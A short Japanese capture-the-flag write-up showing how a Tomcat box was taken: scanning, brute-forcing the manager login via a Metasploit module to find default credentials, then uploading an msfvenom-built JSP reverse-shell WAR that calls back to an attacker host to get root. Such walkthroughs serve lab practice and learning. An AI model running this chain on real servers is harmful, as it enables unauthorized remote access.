まずnmapから
httpサーバーのみ。次にgobuster、niktoで事前調査。
いくらか興味深いページが見られるがページにアクセスしてみる。
どうやらターゲットはTomcatを使用しているようだ。事前調査で気になったページを見ていると/manager/htmlで認証を要求された。StartingPointと違って前のパスワード等はない。
Tomcatについて調査しているとHackTrickのサイトにmetasploitのモジュールが載っていた。これを使用してみる。
auxiliary/scanner/http/tomcat_mgr_login
tomcat/s3cret でログインできたページを探すとファイルをアップロードできる箇所がある。ここでリバースシェルをアップロードできるはずだ。下記サイトからtomcatに上げるWARファイルのリバースシェルのペイロードを探すと
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
これをアップロードしてシェルのアドレスにアクセスするとリバースシェルが得られた。ちなみにアドレス自体はページに表示される。
アクセスして権限を見てみると最初からrootだった。
